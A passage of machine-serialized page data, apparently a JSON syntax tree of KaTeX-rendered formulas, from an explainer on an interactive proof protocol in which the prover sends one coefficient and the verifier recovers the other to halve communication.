14096,"children":114098},{"className":114097},[246,2151,2189],[114099],{"type":31,"value":2289},{"type":25,"tag":216,"props":114101,"children":114103},{"className":114102},[408],[114104],{"type":31,"value":411},{"type":25,"tag":216,"props":114106,"children":114108},{"className":114107},[304],[114109],{"type":25,"tag":216,"props":114110,"children":114112},{"className":114111,"style":2209},[309],[114113],{"type":25,"tag":216,"props":114114,"children":114115},{},[],{"type":25,"tag":216,"props":114117,"children":114119},{"className":114118},[287],[114120],{"type":31,"value":1850},{"type":25,"tag":216,"props":114122,"children":114124},{"className":114123,"style":2229},[246,2151],[114125],{"type":31,"value":10084},{"type":25,"tag":216,"props":114127,"children":114129},{"className":114128},[427],[114130],{"type":31,"value":1888},{"type":25,"tag":216,"props":114132,"children":114134},{"className":114133,"style":258},[257],[],{"type":25,"tag":216,"props":114136,"children":114138},{"className":114137},[263],[114139],{"type":31,"value":266},{"type":25,"tag":216,"props":114141,"children":114143},{"className":114142,"style":258},[257],[],{"type":25,"tag":216,"props":114145,"children":114147},{"className":114146},[235],[114148,114153,114158,114162,114167],{"type":25,"tag":216,"props":114149,"children":114152},{"className":114150,"style":114151},[240],"height:0.6667em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":114154,"children":114156},{"className":114155},[246,2151],[114157],{"type":31,"value":162},{"type":25,"tag":216,"props":114159,"children":114161},{"className":114160,"style":335},[257],[],{"type":25,"tag":216,"props":114163,"children":114165},{"className":114164},[340],[114166],{"type":31,"value":3539},{"type":25,"tag":216,"props":114168,"children":114170},{"className":114169,"style":335},[257],[],{"type":25,"tag":216,"props":114172,"children":114174},{"className":114173},[235],[114175,114179,114184],{"type":25,"tag":216,"props":114176,"children":114178},{"className":114177,"style":96933},[240],[],{"type":25,"tag":216,"props":114180,"children":114182},{"className":114181},[246,2151],[114183],{"type":31,"value":7171},{"type":25,"tag":216,"props":114185,"children":114187},{"className":114186,"style":2229},[246,2151],[114188],{"type":31,"value":10084},{"type":31,"value":114190}," has only two coefficients. Since the verifier knows ",{"type":25,"tag":82,"props":114192,"children":114194},{"className":114193},[212,4702],[114195],{"type":25,"tag":216,"props":114196,"children":114198},{"className":114197},[224],[114199],{"type":25,"tag":216,"props":114200,"children":114202},{"className":114201,"ariaHidden":230},[229],[114203,114296,114389],{"type":25,"tag":216,"props":114204,"children":114206},{"className":114205},[235],[114207,114211,114268,114273,114278,114283,114287,114292],{"type":25,"tag":216,"props":114208,"children":114210},{"className":114209,"style":5513},[240],[],{"type":25,"tag":216,"props":114212,"children":114214},{"className":114213},[246],[114215,114220],{"type":25,"tag":216,"props":114216,"children":114218},{"className":114217,"style":2325},[246,2151],[114219],{"type":31,"value":113250},{"type":25,"tag":216,"props":114221,"children":114223},{"className":114222},[2159],[114224],{"type":25,"tag":216,"props":114225,"children":114227},{"className":114226},[298,299],[114228,114257],{"type":25,"tag":216,"props":114229,"children":114231},{"className":114230},[304],[114232,114252],{"type":25,"tag":216,"props":114233,"children":114235},{"className":114234,"style":2270},[309],[114236],{"type":25,"tag":216,"props":114237,"children":114238},{"style":2347},[114239,114243],{"type":25,"tag":216,"props":114240,"children":114242},{"className":114241,"style":2181},[319],[],{"type":25,"tag":216,"props":114244,"children":114246},{"className":114245},[2186,2187,2188,2189],[114247],{"type":25,"tag":216,"props":114248,"children":114250},{"className":114249},[246,2151,2189],[114251],{"type":31,"value":2289},{"type":25,"tag":216,"props":114253,"children":114255},{"className":114254},[408],[114256],{"type":31,"value":411},{"type":25,"tag":216,"props":114258,"children":114260},{"className":114259},[304],[114261],{"type":25,"tag":216,"props":114262,"children":114264},{"className":114263,"style":2209},[309],[114265],{"type":25,"tag":216,"props":114266,"children":114267},{},[],{"type":25,"tag":216,"props":114269,"children":114271},{"className":114270},[287],[114272],{"type":31,"value":1850},{"type":25,"tag":216,"props":114274,"children":114276},{"className":114275},[246],[114277],{"type":31,"value":1882},{"type":25,"tag":216,"props":114279,"children":114281},{"className":114280},[427],[114282],{"type":31,"value":1888},{"type":25,"tag":216,"props":114284,"children":114286},{"className":114285,"style":335},[257],[],{"type":25,"tag":216,"props":114288,"children":114290},{"className":114289},[340],[114291],{"type":31,"value":3539},{"type":25,"tag":216,"props":114293,"children":114295},{"className":114294,"style":335},[257],[],{"type":25,"tag":216,"props":114297,"children":114299},{"className":114298},[235],[114300,114304,114361,114366,114371,114376,114380,114385],{"type":25,"tag":216,"props":114301,"children":114303},{"className":114302,"style":5513},[240],[],{"type":25,"tag":216,"props":114305,"children":114307},{"className":114306},[246],[114308,114313],{"type":25,"tag":216,"props":114309,"children":114311},{"className":114310,"style":2325},[246,2151],[114312],{"type":31,"value":113250},{"type":25,"tag":216,"props":114314,"children":114316},{"className":114315},[2159],[114317],{"type":25,"tag":216,"props":114318,"children":114320},{"className":114319},[298,299],[114321,114350],{"type":25,"tag":216,"props":114322,"children":114324},{"className":114323},[304],[114325,114345],{"type":25,"tag":216,"props":114326,"children":114328},{"className":114327,"style":2270},[309],[114329],{"type":25,"tag":216,"props":114330,"children":114331},{"style":2347},[114332,114336],{"type":25,"tag":216,"props":114333,"children":114335},{"className":114334,"style":2181},[319],[],{"type":25,"tag":216,"props":114337,"children":114339},{"className":114338},[2186,2187,2188,2189],[114340],{"type":25,"tag":216,"props":114341,"children":114343},{"className":114342},[246,2151,2189],[114344],{"type":31,"value":2289},{"type":25,"tag":216,"props":114346,"children":114348},{"className":114347},[408],[114349],{"type":31,"value":411},{"type":25,"tag":216,"props":114351,"children":114353},{"className":114352},[304],[114354],{"type":25,"tag":216,"props":114355,"children":114357},{"className":114356,"style":2209},[309],[114358],{"type":25,"tag":216,"props":114359,"children":114360},{},[],{"type":25,"tag":216,"props":114362,"children":114364},{"className":114363},[287],[114365],{"type":31,"value":1850},{"type":25,"tag":216,"props":114367,"children":114369},{"className":114368},[246],[114370],{"type":31,"value":184},{"type":25,"tag":216,"props":114372,"children":114374},{"className":114373},[427],[114375],{"type":31,"value":1888},{"type":25,"tag":216,"props":114377,"children":114379},{"className":114378,"style":258},[257],[],{"type":25,"tag":216,"props":114381,"children":114383},{"className":114382},[263],[114384],{"type":31,"value":266},{"type":25,"tag":216,"props":114386,"children":114388},{"className":114387,"style":258},[257],[],{"type":25,"tag":216,"props":114390,"children":114392},{"className":114391},[235],[114393,114398],{"type":25,"tag":216,"props":114394,"children":114397},{"className":114395,"style":114396},[240],"height:0.8917em;vertical-align:-0.2083em;",[],{"type":25,"tag":216,"props":114399,"children":114401},{"className":114400},[246],[114402,114407],{"type":25,"tag":216,"props":114403,"children":114405},{"className":114404,"style":2679},[246,2151],[114406],{"type":31,"value":2682},{"type":25,"tag":216,"props":114408,"children":114410},{"className":114409},[2159],[114411],{"type":25,"tag":216,"props":114412,"children":114414},{"className":114413},[298,299],[114415,114458],{"type":25,"tag":216,"props":114416,"children":114418},{"className":114417},[304],[114419,114453],{"type":25,"tag":216,"props":114420,"children":114422},{"className":114421,"style":2270},[309],[114423],{"type":25,"tag":216,"props":114424,"children":114425},{"style":2702},[114426,114430],{"type":25,"tag":216,"props":114427,"children":114429},{"className":114428,"style":2181},[319],[],{"type":25,"tag":216,"props":114431,"children":114433},{"className":114432},[2186,2187,2188,2189],[114434],{"type":25,"tag":216,"props":114435,"children":114437},{"className":114436},[246,2189],[114438,114443,114448],{"type":25,"tag":216,"props":114439,"children":114441},{"className":114440},[246,2151,2189],[114442],{"type":31,"value":2289},{"type":25,"tag":216,"props":114444,"children":114446},{"className":114445},[340,2189],[114447],{"type":31,"value":3378},{"type":25,"tag":216,"props":114449,"children":114451},{"className":114450},[246,2189],[114452],{"type":31,"value":184},{"type":25,"tag":216,"props":114454,"children":114456},{"className":114455},[408],[114457],{"type":31,"value":411},{"type":25,"tag":216,"props":114459,"children":114461},{"className":114460},[304],[114462],{"type":25,"tag":216,"props":114463,"children":114466},{"className":114464,"style":114465},[309],"height:0.2083em;",[114467],{"type":25,"tag":216,"props":114468,"children":114469},{},[],{"type":31,"value":114471}," (the previous claim), we have:",{"type":25,"tag":38,"props":114473,"children":114474},{},[114475],{"type":25,"tag":82,"props":114476,"children":114478},{"className":114477},[212,4702],[114479],{"type":25,"tag":216,"props":114480,"children":114482},{"className":114481},[224],[114483],{"type":25,"tag":216,"props":114484,"children":114486},{"className":114485,"ariaHidden":230},[229],[114487,114513,114544,114575,114676,114702,114794],{"type":25,"tag":216,"props":114488,"children":114490},{"className":114489},[235],[114491,114495,114500,114504,114509],{"type":25,"tag":216,"props":114492,"children":114494},{"className":114493,"style":114151},[240],[],{"type":25,"tag":216,"props":114496,"children":114498},{"className":114497},[246,2151],[114499],{"type":31,"value":162},{"type":25,"tag":216,"props":114501,"children":114503},{"className":114502,"style":335},[257],[],{"type":25,"tag":216,"props":114505,"children":114507},{"className":114506},[340],[114508],{"type":31,"value":3539},{"type":25,"tag":216,"props":114510,"children":114512},{"className":114511,"style":335},[257],[],{"type":25,"tag":216,"props":114514,"children":114516},{"className":114515},[235],[114517,114521,114526,114531,114535,114540],{"type":25,"tag":216,"props":114518,"children":114520},{"className":114519,"style":5513},[240],[],{"type":25,"tag":216,"props":114522,"children":114524},{"className":114523},[287],[114525],{"type":31,"value":1850},{"type":25,"tag":216,"props":114527,"children":114529},{"className":114528},[246,2151],[114530],{"type":31,"value":162},{"type":25,"tag":216,"props":114532,"children":114534},{"className":114533,"style":335},[257],[],{"type":25,"tag":216,"props":114536,"children":114538},{"className":114537},[340],[114539],{"type":31,"value":3539},{"type":25,"tag":216,"props":114541,"children":114543},{"className":114542,"style":335},[257],[],{"type":25,"tag":216,"props":114545,"children":114547},{"className":114546},[235],[114548,114552,114557,114562,114566,114571],{"type":25,"tag":216,"props":114549,"children":114551},{"className":114550,"style":5513},[240],[],{"type":25,"tag":216,"props":114553,"children":114555},{"className":114554},[246,2151],[114556],{"type":31,"value":7171},{"type":25,"tag":216,"props":114558,"children":114560},{"className":114559},[427],[114561],{"type":31,"value":1888},{"type":25,"tag":216,"props":114563,"children":114565},{"className":114564,"style":258},[257],[],{"type":25,"tag":216,"props":114567,"children":114569},{"className":114568},[263],[114570],{"type":31,"value":266},{"type":25,"tag":216,"props":114572,"children":114574},{"className":114573,"style":258},[257],[],{"type":25,"tag":216,"props":114576,"children":114578},{"className":114577},[235],[114579,114583,114654,114658,114662,114668,114672],{"type":25,"tag":216,"props":114580,"children":114582},{"className":114581,"style":114396},[240],[],{"type":25,"tag":216,"props":114584,"children":114586},{"className":114585},[246],[114587,114592],{"type":25,"tag":216,"props":114588,"children":114590},{"className":114589,"style":2679},[246,2151],[114591],{"type":31,"value":2682},{"type":25,"tag":216,"props":114593,"children":114595},{"className":114594},[2159],[114596],{"type":25,"tag":216,"props":114597,"children":114599},{"className":114598},[298,299],[114600,114643],{"type":25,"tag":216,"props":114601,"children":114603},{"className":114602},[304],[114604,114638],{"type":25,"tag":216,"props":114605,"children":114607},{"className":114606,"style":2270},[309],[114608],{"type":25,"tag":216,"props":114609,"children":114610},{"style":2702},[114611,114615],{"type":25,"tag":216,"props":114612,"children":114614},{"className":114613,"style":2181},[319],[],{"type":25,"tag":216,"props":114616,"children":114618},{"className":114617},[2186,2187,2188,2189],[114619],{"type":25,"tag":216,"props":114620,"children":114622},{"className":114621},[246,2189],[114623,114628,114633],{"type":25,"tag":216,"props":114624,"children":114626},{"className":114625},[246,2151,2189],[114627],{"type":31,"value":2289},{"type":25,"tag":216,"props":114629,"children":114631},{"className":114630},[340,2189],[114632],{"type":31,"value":3378},{"type":25,"tag":216,"props":114634,"children":114636},{"className":114635},[246,2189],[114637],{"type":31,"value":184},{"type":25,"tag":216,"props":114639,"children":114641},{"className":114640},[408],[114642],{"type":31,"value":411},{"type":25,"tag":216,"props":114644,"children":114646},{"className":114645},[304],[114647],{"type":25,"tag":216,"props":114648,"children":114650},{"className":114649,"style":114465},[309],[114651],{"type":25,"tag":216,"props":114652,"children":114653},{},[],{"type":25,"tag":216,"props":114655,"children":114657},{"className":114656,"style":258},[257],[],{"type":25,"tag":216,"props":114659,"children":114661},{"className":114660,"style":258},[257],[],{"type":25,"tag":216,"props":114663,"children":114665},{"className":114664},[263],[114666],{"type":31,"value":114667},"⟹",{"type":25,"tag":216,"props":114669,"children":114671},{"className":114670,"style":258},[257],[],{"type":25,"tag":216,"props":114673,"children":114675},{"className":114674,"style":258},[257],[],{"type":25,"tag":216,"props":114677,"children":114679},{"className":114678},[235],[114680,114684,114689,114693,114698],{"type":25,"tag":216,"props":114681,"children":114683},{"className":114682,"style":96933},[240],[],{"type":25,"tag":216,"props":114685,"children":114687},{"className":114686},[246,2151],[114688],{"type":31,"value":7171},{"type":25,"tag":216,"props":114690,"children":114692},{"className":114691,"style":258},[257],[],{"type":25,"tag":216,"props":114694,"children":114696},{"className":114695},[263],[114697],{"type":31,"value":266},{"type":25,"tag":216,"props":114699,"children":114701},{"className":114700,"style":258},[257],[],{"type":25,"tag":216,"props":114703,"children":114705},{"className":114704},[235],[114706,114710,114781,114785,114790],{"type":25,"tag":216,"props":114707,"children":114709},{"className":114708,"style":114396},[240],[],{"type":25,"tag":216,"props":114711,"children":114713},{"className":114712},[246],[114714,114719],{"type":25,"tag":216,"props":114715,"children":114717},{"className":114716,"style":2679},[246,2151],[114718],{"type":31,"value":2682},{"type":25,"tag":216,"props":114720,"children":114722},{"className":114721},[2159],[114723],{"type":25,"tag":216,"props":114724,"children":114726},{"className":114725},[298,299],[114727,114770],{"type":25,"tag":216,"props":114728,"children":114730},{"className":114729},[304],[114731,114765],{"type":25,"tag":216,"props":114732,"children":114734},{"className":114733,"style":2270},[309],[114735],{"type":25,"tag":216,"props":114736,"children":114737},{"style":2702},[114738,114742],{"type":25,"tag":216,"props":114739,"children":114741},{"className":114740,"style":2181},[319],[],{"type":25,"tag":216,"props":114743,"children":114745},{"className":114744},[2186,2187,2188,2189],[114746],{"type":25,"tag":216,"props":114747,"children":114749},{"className":114748},[246,2189],[114750,114755,114760],{"type":25,"tag":216,"props":114751,"children":114753},{"className":114752},[246,2151,2189],[114754],{"type":31,"value":2289},{"type":25,"tag":216,"props":114756,"children":114758},{"className":114757},[340,2189],[114759],{"type":31,"value":3378},{"type":25,"tag":216,"props":114761,"children":114763},{"className":114762},[246,2189],[114764],{"type":31,"value":184},{"type":25,"tag":216,"props":114766,"children":114768},{"className":114767},[408],[114769],{"type":31,"value":411},{"type":25,"tag":216,"props":114771,"children":114773},{"className":114772},[304],[114774],{"type":25,"tag":216,"props":114775,"children":114777},{"className":114776,"style":114465},[309],[114778],{"type":25,"tag":216,"props":114779,"children":114780},{},[],{"type":25,"tag":216,"props":114782,"children":114784},{"className":114783,"style":335},[257],[],{"type":25,"tag":216,"props":114786,"children":114788},{"className":114787},[340],[114789],{"type":31,"value":3378},{"type":25,"tag":216,"props":114791,"children":114793},{"className":114792,"style":335},[257],[],{"type":25,"tag":216,"props":114795,"children":114797},{"className":114796},[235],[114798,114802,114807],{"type":25,"tag":216,"props":114799,"children":114801},{"className":114800,"style":5293},[240],[],{"type":25,"tag":216,"props":114803,"children":114805},{"className":114804},[246],[114806],{"type":31,"value":331},{"type":25,"tag":216,"props":114808,"children":114810},{"className":114809},[246,2151],[114811],{"type":31,"value":162},{"type":25,"tag":38,"props":114813,"children":114814},{},[114815,114817,114935,114937,114962],{"type":31,"value":114816},"So the prover only sends ",{"type":25,"tag":82,"props":114818,"children":114820},{"className":114819},[212,4702],[114821],{"type":25,"tag":216,"props":114822,"children":114824},{"className":114823},[224],[114825],{"type":25,"tag":216,"props":114826,"children":114828},{"className":114827,"ariaHidden":230},[229],[114829,114855],{"type":25,"tag":216,"props":114830,"children":114832},{"className":114831},[235],[114833,114837,114842,114846,114851],{"type":25,"tag":216,"props":114834,"children":114836},{"className":114835,"style":6315},[240],[],{"type":25,"tag":216,"props":114838,"children":114840},{"className":114839},[246,2151],[114841],{"type":31,"value":162},{"type":25,"tag":216,"props":114843,"children":114845},{"className":114844,"style":258},[257],[],{"type":25,"tag":216,"props":114847,"children":114849},{"className":114848},[263],[114850],{"type":31,"value":266},{"type":25,"tag":216,"props":114852,"children":114854},{"className":114853,"style":258},[257],[],{"type":25,"tag":216,"props":114856,"children":114858},{"className":114857},[235],[114859,114863,114920,114925,114930],{"type":25,"tag":216,"props":114860,"children":114862},{"className":114861,"style":5513},[240],[],{"type":25,"tag":216,"props":114864,"children":114866},{"className":114865},[246],[114867,114872],{"type":25,"tag":216,"props":114868,"children":114870},{"className":114869,"style":2325},[246,2151],[114871],{"type":31,"value":113250},{"type":25,"tag":216,"props":114873,"children":114875},{"className":114874},[2159],[114876],{"type":25,"tag":216,"props":114877,"children":114879},{"className":114878},[298,299],[114880,114909],{"type":25,"tag":216,"props":114881,"children":114883},{"className":114882},[304],[114884,114904],{"type":25,"tag":216,"props":114885,"children":114887},{"className":114886,"style":2270},[309],[114888],{"type":25,"tag":216,"props":114889,"children":114890},{"style":2347},[114891,114895],{"type":25,"tag":216,"props":114892,"children":114894},{"className":114893,"style":2181},[319],[],{"type":25,"tag":216,"props":114896,"children":114898},{"className":114897},[2186,2187,2188,2189],[114899],{"type":25,"tag":216,"props":114900,"children":114902},{"className":114901},[246,2151,2189],[114903],{"type":31,"value":2289},{"type":25,"tag":216,"props":114905,"children":114907},{"className":114906},[408],[114908],{"type":31,"value":411},{"type":25,"tag":216,"props":114910,"children":114912},{"className":114911},[304],[114913],{"type":25,"tag":216,"props":114914,"children":114916},{"className":114915,"style":2209},[309],[114917],{"type":25,"tag":216,"props":114918,"children":114919},{},[],{"type":25,"tag":216,"props":114921,"children":114923},{"className":114922},[287],[114924],{"type":31,"value":1850},{"type":25,"tag":216,"props":114926,"children":114928},{"className":114927},[246],[114929],{"type":31,"value":1882},{"type":25,"tag":216,"props":114931,"children":114933},{"className":114932},[427],[114934],{"type":31,"value":1888},{"type":31,"value":114936},", and the verifier recovers ",{"type":25,"tag":82,"props":114938,"children":114940},{"className":114939},[212,4702],[114941],{"type":25,"tag":216,"props":114942,"children":114944},{"className":114943},[224],[114945],{"type":25,"tag":216,"props":114946,"children":114948},{"className":114947,"ariaHidden":230},[229],[114949],{"type":25,"tag":216,"props":114950,"children":114952},{"className":114951},[235],[114953,114957],{"type":25,"tag":216,"props":114954,"children":114956},{"className":114955,"style":96933},[240],[],{"type":25,"tag":216,"props":114958,"children":114960},{"className":114959},[246,2151],[114961],{"type":31,"value":7171},{"type":31,"value":114963},". This saves 50% on communication costs.",{"type":25,"tag":38,"props":114965,"children":114966},{},[114967],{"type":31,"value":114968},"The next claim in the chain is",{"type":25,"tag":38,"props":114970,"children":114971},{},[114972],{"type":25,"tag":82,"props":114973,"children":114975},{"className":114974},[212,4702],[114976],{"type":25,"tag":216,"props":114977,"children":114979},{"className":114978},[224],[114980],{"type":25,"tag":216,"props":114981,"children":114983},{"className":114982,"ariaHidden":230},[229],[114984,115062,115207,115233,115259,115337,115363,115460,115496,115574,115610,115698,115790],{"type":25,"tag":216,"props":114985,"children":114987},{"className":114986},[235],[114988,114992,115049,115053,115058],{"type":25,"tag":216,"props":114989,"children":114991},{"className":114990,"style":4719},[240],[],{"type":25,"tag":216,"props":114993,"children":114995},{"className":114994},[246],[114996,115001],{"type":25,"tag":216,"props":114997,"children":114999},{"className":114998,"style":2679},[246,2151],[115000],{"type":31,"value":2682},{"type":25,"tag":216,"props":115002,"children":115004},{"className":115003},[2159],[115005],{"type":25,"tag":216,"props":115006,"children":115008},{"className":115007},[298,299],[115009,115038],{"type":25,"tag":216,"props":115010,"children":115012},{"className":115011},[304],[115013,115033],{"type":25,"tag":216,"props":115014,"children":115016},{"className":115015,"style":2270},[309],[115017],{"type":25,"tag":216,"props":115018,"children":115019},{"style":2702},[115020,115024],{"type":25,"tag":216,"props":115021,"children":115023},{"className":115022,"style":2181},[319],[],{"type":25,"tag":216,"props":115025,"children":115027},{"className":115026},[2186,2187,2188,2189],[115028],{"type":25,"tag":216,"props":115029,"children":115031},{"className":115030},[246,2151,2189],[115032],{"type":31,"value":2289},{"type":25,"tag":216,"props":115034,"children":115036},{"className":115035},[408],[115037],{"type":31,"value":411},{"type":25,"tag":216,"props":115039,"children":115041},{"className":115040},[304],[115042],{"type":25,"tag":216,"props":115043,"children":115045},{"className":115044,"style":2209},[309],[115046],{"type":25,"tag":216,"props":115047,"children":115048},{},[],{"type":25,"tag":216,"props":115050,"children":115052},{"className":115051,"style":258},[257],[],{"type":25,"tag":216,"props":115054,"children":115056},{"className":115055},[263],[115057],{"type":31,"value":266},{"type":25,"tag":216,"props":115059,"children":115061},{"className":115060,"style":258},[257],[],{"type":25,"tag":216,"props":115063,"children":115065},{"className":115064},[235],[115066,115070,115127,115132,115189,115194,115198,115203],{"type":25,"tag":216,"props":115067,"children":115069},{"className":115068,"style":5513},[240],[],{"type":25,"tag":216,"props":115071,"children":115073},{"className":115072},[246],[115074,115079],{"type":25,"tag":216,"props":115075,"children":115077},{"className":115076,"style":2325},[246,2151],[115078],{"type":31,"value":113250},{"type":25,"tag":216,"props":115080,"children":115082},{"className":115081},[2159],[115083],{"type":25,"tag":216,"props":115084,"children":115086},{"className":115085},[298,299],[115087,115116],{"type":25,"tag":216,"props":115088,"children":115090},{"className":115089},[304],[115091,115111],{"type":25,"tag":216,"props":115092,"children":115094},{"className":115093,"style":2270},[309],[115095],{"type":25,"tag":216,"props":115096,"children":115097},{"style":2347},[115098,115102],{"type":25,"tag":216,"props":115099,"children":115101},{"className":115100,"style":2181},[319],[],{"type":25,"tag":216,"props":115103,"children":115105},{"className":115104},[2186,2187,2188,2189],[115106],{"type":25,"tag":216,"props":115107,"children":115109},{"className":115108},[246,2151,2189],[115110],{"type":31,"value":2289},{"type":25,"tag":216,"props":115112,"children":115114},{"className":115113},[408],[115115],{"type":31,"value":411},{"type":25,"tag":216,"props":115117,"children":115119},{"className":115118},[304],[115120],{"type":25,"tag":216,"props":115121,"children":115123},{"className":115122,"style":2209},[309],[115124],{"type":25,"tag":216,"props":115125,"children":115126},{},[],{"type":25,"tag":216,"props":115128,"children":115130},{"className":115129},[287],[115131],{"type":31,"value":1850},{"type":25,"tag":216,"props":115133,"children":115135},{"className":115134},[246],[115136,115141],{"type":25,"tag":216,"props":115137,"children":115139},{"className":115138,"style":2752},[246,2151],[115140],{"type":31,"value":97829},{"type":25,"tag":216,"props":115142,"children":115144},{"className":115143},[2159],[115145],{"type":25,"tag":216,"props":115146,"children":115148},{"className":115147},[298,299],[115149,115178],{"type":25,"tag":216,"props":115150,"children":115152},{"className":115151},[304],[115153,115173],{"type":25,"tag":216,"props":115154,"children":115156},{"className":115155,"style":2270},[309],[115157],{"type":25,"tag":216,"props":115158,"children":115159},{"style":2774},[115160,115164],{"type":25,"tag":216,"props":115161,"children":115163},{"className":115162,"style":2181},[319],[],{"type":25,"tag":216,"props":115165,"children":115167},{"className":115166},[2186,2187,2188,2189],[115168],{"type":25,"tag":216,"props":115169,"children":115171},{"className":115170},[246,2151,2189],[115172],{"type":31,"value":2289},{"type":25,"tag":216,"props":115174,"children":115176},{"className":115175},[408],[115177],{"type":31,"value":411},{"type":25,"tag":216,"props":115179,"children":115181},{"className":115180},[304],[115182],{"type":25,"tag":216,"props":115183,"children":115185},{"className":115184,"style":2209},[309],[115186],{"type":25,"tag":216,"props":115187,"children":115188},{},[],{"type":25,"tag":216,"props":115190,"children":115192},{"className":115191},[427],[115193],{"type":31,"value":1888},{"type":25,"tag":216,"props":115195,"children":115197},{"className":115196,"style":258},[257],[],{"type":25,"tag":216,"props":115199,"children":115201},{"className":115200},[263],[115202],{"type":31,"value":266},{"type":25,"tag":216,"props":115204,"children":115206},{"className":115205,"style":258},[257],[],{"type":25,"tag":216,"props":115208,"children":115210},{"className":115209},[235],[115211,115215,115220,115224,115229],{"type":25,"tag":216,"props":115212,"children":115214},{"className":115213,"style":114151},[240],[],{"type":25,"tag":216,"props":115216,"children":115218},{"className":115217},[246,2151],[115219],{"type":31,"value":162},{"type":25,"tag":216,"props":115221,"children":115223},{"className":115222,"style":335},[257],[],{"type":25,"tag":216,"props":115225,"children":115227},{"className":115226},[340],[115228],{"type":31,"value":3539},{"type":25,"tag":216,"props":115230,"children":115232},{"className":115231,"style":335},[257],[],{"type":25,"tag":216,"props":115234,"children":115236},{"className":115235},[235],[115237,115241,115246,115250,115255],{"type":25,"tag":216,"props":115238,"children":115240},{"className":115239,"style":96933},[240],[],{"type":25,"tag":216,"props":115242,"children":115244},{"className":115243},[246,2151],[115245],{"type":31,"value":7171},{"type":25,"tag":216,"props":115247,"children":115249},{"className":115248,"style":335},[257],[],{"type":25,"tag":216,"props":115251,"children":115253},{"className":115252},[340],[115254],{"type":31,"value":343},{"type":25,"tag":216,"props":115256,"children":115258},{"className":115257,"style":335},[257],[],{"type":25,"tag":216,"props":115260,"children":115262},{"className":115261},[235],[115263,115267,115324,115328,115333],{"type":25,"tag":216,"props":115264,"children":115266},{"className":115265,"style":4827},[240],[],{"type":25,"tag":216,"props":115268,"children":115270},{"className":115269},[246],[115271,115276],{"type":25,"tag":216,"props":115272,"children":115274},{"className":115273,"style":2752},[246,2151],[115275],{"type":31,"value":97829},{"type":25,"tag":216,"props":115277,"children":115279},{"className":115278},[2159],[115280],{"type":25,"tag":216,"props":115281,"children":115283},{"className":115282},[298,299],[115284,115313],{"type":25,"tag":216,"props":115285,"children":115287},{"className":115286},[304],[115288,115308],{"type":25,"tag":216,"props":115289,"children":115291},{"className":115290,"style":2270},[309],[115292],{"type":25,"tag":216,"props":115293,"children":115294},{"style":2774},[115295,115299],{"type":25,"tag":216,"props":115296,"children":115298},{"className":115297,"style":2181},[319],[],{"type":25,"tag":216,"props":115300,"children":115302},{"className":115301},[2186,2187,2188,2189],[115303],{"type":25,"tag":216,"props":115304,"children":115306},{"className":115305},[246,2151,2189],[115307],{"type":31,"value":2289},{"type":25,"tag":216,"props":115309,"children":115311},{"className":115310},[408],[115312],{"type":31,"value":411},{"type":25,"tag":216,"props":115314,"children":115316},{"className":115315},[304],[115317],{"type":25,"tag":216,"props":115318,"children":115320},{"className":115319,"style":2209},[309],[115321],{"type":25,"tag":216,"props":115322,"children":115323},{},[],{"type":25,"tag":216,"props":115325,"children":115327},{"className":115326,"style":258},[257],[],{"type":25,"tag":216,"props":115329,"children":115331},{"className":115330},[263],[115332],{"type":31,"value":266},{"type":25,"tag":216,"props":115334,"children":115336},{"className":115335,"style":258},[257],[],{"type":25,"tag":216,"props":115338,"children":115340},{"className":115339},[235],[115341,115345,115350,115354,115359],{"type":25,"tag":216,"props":115342,"children":115344},{"className":115343,"style":114151},[240],[],{"type":25,"tag":216,"props":115346,"children":115348},{"className":115347},[246,2151],[115349],{"type":31,"value":162},{"type":25,"tag":216,"props":115351,"children":115353},{"className":115352,"style":335},[257],[],{"type":25,"tag":216,"props":115355,"children":115357},{"className":115356},[340],[115358],{"type":31,"value":3539},{"type":25,"tag":216,"props":115360,"children":115362},{"className":115361,"style":335},[257],[],{"type":25,"tag":216,"props":115364,"children":115366},{"className":115365},[235],[115367,115371,115376,115447,115451,115456],{"type":25,"tag":216,"props":115368,"children":115370},{"className":115369,"style":5513},[240],[],{"type":25,"tag":216,"props":115372,"children":115374},{"className":115373},[287],[115375],{"type":31,"value":1850},{"type":25,"tag":216,"props":115377,"children":115379},{"className":115378},[246],[115380,115385],{"type":25,"tag":216,"props":115381,"children":115383},{"className":115382,"style":2679},[246,2151],[115384],{"type":31,"value":2682},{"type":25,"tag":216,"props":115386,"children":115388},{"className":115387},[2159],[115389],{"type":25,"tag":216,"props":115390,"children":115392},{"className":115391},[298,299],[115393,115436],{"type":25,"tag":216,"props":115394,"children":115396},{"className":115395},[304],[115397,115431],{"type":25,"tag":216,"props":115398,"children":115400},{"className":115399,"style":2270},[309],[115401],{"type":25,"tag":216,"props":115402,"children":115403},{"style":2702},[115404,115408],{"type":25,"tag":216,"props":115405,"children":115407},{"className":115406,"style":2181},[319],[],{"type":25,"tag":216,"props":115409,"children":115411},{"className":115410},[2186,2187,2188,2189],[115412],{"type":25,"tag":216,"props":115413,"children":115415},{"className":115414},[246,2189],[115416,115421,115426],{"type":25,"tag":216,"props":115417,"children":115419},{"className":115418},[246,2151,2189],[115420],{"type":31,"value":2289},{"type":25,"tag":216,"props":115422,"children":115424},{"className":115423},[340,2189],[115425],{"type":31,"value":3378},{"type":25,"tag":216,"props":115427,"children":115429},{"className":115428},[246,2189],[115430],{"type":31,"value":184},{"type":25,"tag":216,"props":115432,"children":115434},{"className":115433},[408],[115435],{"type":31,"value":411},{"type":25,"tag":216,"props":115437,"children":115439},{"className":115438},[304],[115440],{"type":25,"tag":216,"props":115441,"children":115443},{"className":115442,"style":114465},[309],[115444],{"type":25,"tag":216,"props":115445,"children":115446},{},[],{"type":25,"tag":216,"props":115448,"children":115450},{"className":115449,"style":335},[257],[],{"type":25,"tag":216,"props":115452,"children":115454},{"className":115453},[340],[115455],{"type":31,"value":3378},{"type":25,"tag":216,"props":115457,"children":115459},{"className":115458,"style":335},[257],[],{"type":25,"tag":216,"props":115461,"children":115463},{"className":115462},[235],[115464,115468,115473,115478,115483,115487,115492],{"type":25,"tag":216,"props":115465,"children":115467},{"className":115466,"style":5513},[240],[],{"type":25,"tag":216,"props":115469,"children":115471},{"className":115470},[246],[115472],{"type":31,"value":331},{"type":25,"tag":216,"props":115474,"children":115476},{"className":115475},[246,2151],[115477],{"type":31,"value":162},{"type":25,"tag":216,"props":115479,"children":115481},{"className":115480},[427],[115482],{"type":31,"value":1888},{"type":25,"tag":216,"props":115484,"children":115486},{"className":115485,"style":335},[257],[],{"type":25,"tag":216,"props":115488,"children":115490},{"className":115489},[340],[115491],{"type":31,"value":343},{"type":25,"tag":216,"props":115493,"children":115495